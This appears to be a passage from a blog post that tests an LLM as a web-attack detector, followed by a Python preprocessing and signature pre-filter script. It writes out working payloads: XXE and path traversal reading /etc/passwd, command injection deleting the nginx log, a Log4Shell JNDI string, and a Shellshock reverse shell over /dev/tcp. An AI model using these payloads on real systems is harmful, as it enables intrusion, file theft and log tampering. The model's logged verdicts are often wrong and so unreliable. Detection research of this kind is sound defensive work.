USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: max-age=0
CONTENT-LENGTH: 291
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3C%3Fxml++version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A+++%3C%21ELEMENT+foo+ANY+%3E%0D%0A+++%3C%21ENTITY+xxe+SYSTEM++%22file%3A%2F%2F%2Fdev%2Frandom%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is a legitimate HTTP request.
POST parameter (2)
Slightly modified the attack signature and tried again.
POST :<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
10.00 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 287
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this HTTP request is not a cyber attack.
It is a legitimate request for a web page.
POST parameter, no headers
POST :<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
4.36 seconds
Detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%3C%3Fxml++version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A+++%3C%21ELEMENT+foo+ANY+%3E%0D%0A+++%3C%21ENTITY+xxe+SYSTEM++%22file%3A%2F%2F%2Fdev%2Frandom%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
Yes, this is a cyber attack. It is an example of an XML External Entity (XXE) attack,
which is an attack vector that exploits a web application's processing of XML documents.
The attacker is attempting to inject malicious code into the application by sending an XML document with a malicious entity reference.
Path traversal
GET parameter
GET:../../../../etc/passwd
3.25 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
GET /?file=../../../../etc/passwd HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
No, this HTTP request is not a cyber attack.
It is a normal request for a file, and it does not contain any malicious code.
GET parameter, no headers
GET:../../../../etc/passwd
3.77 seconds
Detected
Is the following HTTP request a cyber attack?
-----
GET /?file=../../../../etc/passwd HTTP/1.1
Yes, this is a type of cyber attack known as a directory traversal attack.
OS command injection
GET:;id
2.35 seconds
Not detected
Whether such a short attack signature gets detected is the point of interest here.
[2023-02-21 13:13:46] local.INFO: Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;id HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
No, this is not a cyber attack. It is an HTTP request.
GET parameter, no headers
GET:;id
4.61 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;id HTTP/1.1
It depends. This request is not necessarily a cyber attack, but it could be a sign of malicious intent.
It could be an attempt to access a file that should not be accessible, or to run a command on the server.
Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;%20rm%20-rf%20/var/log/nginx/access.log HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
The request contains a malicious command to delete the nginx access log from the server,
which is an attempt to damage the system.
This time it was blocked. It even had the spare capacity to determine that the command deletes the Nginx access log.
Log4Shell
From here on we evaluate attack requests that target specific products.
POST parameter
POST:${jndi:ldap://127.0.0.1:1389/a}
4.16 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/?
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 101
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is an HTTP request for a web page.
POST parameter, no headers
POST:${jndi:ldap://127.0.0.1:1389/a}
2.68 seconds
Not detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. It appears to be a normal HTTP request.
It appears to have difficulty detecting attacks against specific products.
POST parameter, no headers
To remove even more noise, also delete the CSRF token.
POST:${jndi:ldap://127.0.0.1:1389/a}
CSRF token removed from the POST data
? seconds
Detected
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
p=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D
Yes, this is a cyber attack. The request is attempting to exploit a JNDI injection vulnerability.
Finally detected.
WordPress user enumeration
Path: /wp-json/wp/v2/users
6.49 seconds
Not detected
[2023-02-21 13:03:48] local.INFO: Is the following HTTP request a cyber attack?
-----
GET /wp-json/wp/v2/users HTTP/1.1
No, this is not a cyber attack. It is a legitimate HTTP request for a web page.
Is the following HTTP request a cyber attack?
-----
GET /cgi-bin/test.cgi HTTP/1.1
ACCEPT: */*
USER-AGENT: () { :;};/bin/bash -i >& /dev/tcp/127.0.0.1/3333 0>&1
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack. It is an example of a Shellshock attack,
which is a type of attack that takes advantage of a vulnerability in the Bash shell.
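The pattern across the experiments above is consistent: the browser headers and the CSRF token act as noise, URL-encoded bodies hide the payload, and the model is most reliable when it sees only the request line and the decoded parameters. The following added example (not the post's code) turns that finding into a preprocessing step a WAF could run before asking an LLM: it drops the noise, URL-decodes the parameters, keeps a header only if the header itself carries something suspicious (so the Shellshock User-Agent survives), and runs a cheap signature pre-filter so obvious cases never need a 3 to 10 second model call. The prompt wording and the sample requests are the post's (trimmed); the signature list and the function names are this example's own choices.

```python
"""Reduce an HTTP request to its payload-bearing parts before LLM classification."""
import re
from urllib.parse import unquote_plus, urlsplit

PROMPT_HEADER = "Is the following HTTP request a cyber attack?\n-----\n"
HEADER_LINE = re.compile(r"^[A-Za-z][A-Za-z0-9-]*:\s")
NOISE_PARAMS = {"_token"}  # Laravel's CSRF token, present in every form post

# Deterministic pre-filter: cheap signatures for the classes tested in the post.
SIGNATURES = [
    ("xss",            re.compile(r"<\s*script\b", re.I)),
    ("sqli",           re.compile(r"\b(sleep|benchmark)\s*\(|\bunion\s+select\b", re.I)),
    ("xxe",            re.compile(r"<!ENTITY\b", re.I)),
    ("path_traversal", re.compile(r"(\.\./){2,}")),
    ("jndi",           re.compile(r"\$\{jndi:", re.I)),
    ("shellshock",     re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("os_command",     re.compile(r"[;|&`]\s*(id|rm|cat|ls|wget|curl|bash|sh|nc)\b")),
    ("wp_user_enum",   re.compile(r"^/wp-json/wp/v2/users")),
]

# Sample requests taken from the post, trimmed to a few headers each.
BENIGN_POST = """POST /post HTTP/1.1
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CONTENT-TYPE: application/x-www-form-urlencoded
HOST: 127.0.0.1
msg=TEST%0D%0A&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu"""
XSS_POST = """POST /post HTTP/1.1
CONTENT-TYPE: application/x-www-form-urlencoded
HOST: 127.0.0.1
msg=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu"""
TRAVERSAL_GET = """GET /?file=../../../../etc/passwd HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7
HOST: 127.0.0.1"""
LOG4SHELL_POST = """POST /post HTTP/1.1
msg=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu"""
SHELLSHOCK_GET = """GET /cgi-bin/test.cgi HTTP/1.1
ACCEPT: */*
USER-AGENT: () { :;};/bin/bash -i >& /dev/tcp/127.0.0.1/3333 0>&1
HOST: 127.0.0.1"""
WP_GET = """GET /wp-json/wp/v2/users HTTP/1.1"""


def scan(text):
    """Names of every signature that matches `text`, in list order."""
    return [name for name, rx in SIGNATURES if rx.search(text)]


def parse_raw_request(raw):
    """Split the post's request format into (request line, headers dict, body)."""
    lines = raw.strip("\n").splitlines()
    headers, body = {}, []
    for line in lines[1:]:
        if not body and HEADER_LINE.match(line):
            name, value = line.split(":", 1)
            headers[name.strip().upper()] = value.strip()
        else:
            body.append(line)  # first non-header line starts the body
    return lines[0], headers, "\n".join(body)


def split_params(query):
    """Decode key=value pairs, dropping the CSRF token. Splits on '&' only,
    so a ';' inside a value (the post's 'bob.txt;id') stays in the value."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        key, value = unquote_plus(key), unquote_plus(value)
        if key not in NOISE_PARAMS:
            pairs.append((key, value))
    return pairs


def reduce_request(raw):
    request_line, headers, body = parse_raw_request(raw)
    method, target, version = request_line.split(" ", 2)
    url = urlsplit(target)
    params = split_params(url.query) + split_params(body)
    findings = []
    for text in [url.path, *[v for _, v in params], *headers.values()]:
        findings += [f for f in scan(text) if f not in findings]
    kept = {n: v for n, v in headers.items() if scan(v)}  # payload-bearing headers only
    return {"request_line": f"{method} {url.path} {version}",
            "headers": kept, "params": params, "findings": findings}


def classify(raw):
    """First signature hit, or None when the LLM (or a human) has to decide."""
    findings = reduce_request(raw)["findings"]
    return findings[0] if findings else None


def build_prompt(raw):
    """The post's prompt, but over the reduced request."""
    r = reduce_request(raw)
    lines = ([r["request_line"]]
             + [f"{n}: {v}" for n, v in r["headers"].items()]
             + [f"{k}={v}" for k, v in r["params"]])
    return PROMPT_HEADER + "\n".join(lines)


if __name__ == "__main__":
    for sample in (BENIGN_POST, XSS_POST, TRAVERSAL_GET, LOG4SHELL_POST, SHELLSHOCK_GET, WP_GET):
        print(classify(sample), "|", build_prompt(sample).replace("\n", " / "))
```

The pre-filter decides the cases the post shows the model getting wrong with headers present (encoded XSS body, XXE body, path traversal, Log4Shell, the WordPress path) without a model call at all, and the reduced prompt is what goes to the model for everything else. The signatures are intentionally narrow so that they never override a model verdict of "attack"; their job is to catch the known patterns cheaply, not to replace the classifier.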